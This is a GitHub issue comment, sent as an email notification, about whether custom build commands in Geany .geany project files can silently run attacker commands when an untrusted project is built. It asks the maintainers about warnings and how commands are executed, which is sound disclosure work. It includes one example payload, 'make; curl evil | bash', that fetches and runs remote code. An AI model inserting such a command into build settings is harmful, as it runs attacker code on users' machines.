CVE-Hunter-Leo left a comment (geany/geany#4610) Thanks for the comment. Yeah, you're right. If an attacker can put whatever they want into the build command field in the .geany file, then using execve instead of a shell doesn't really change much — they can just do sh -c 'make; curl evil | bash' or hide the payload in a Makefile. What I was trying to point out is that project files can silently carry these custom commands. So if someone opens a project they didn't create themselves and hits build, it can end up running commands without it being immediately obvious.
A few things I'm wondering: 1)When a project loads and overrides the default build commands, does Geany show any kind of warning or prompt to review them? 2)Are build commands only ever run when the user explicitly triggers them, or is there any automatic execution on project load? 3)Just out of curiosity, how does Geany actually execute these commands right now? Does it go through /bin/sh -c or use something like g_spawn_async with an argv array? If the maintainers see this as expected behaviour (similar to running make on an untrusted Makefile), I'm happy to update the issue and remove the CVE request. I mainly wanted to check whether there's any simple defense-in-depth improvement worth adding, like a warning when custom commands are present. Appreciate your thoughts and feedback. -- Reply to this email directly or view it on GitHub: https://github.com/geany/geany/issues/4610#issuecomment-4830889731 You are receiving this because you are subscribed to this thread. Message ID: <geany/geany/issues/4610/[email protected]>
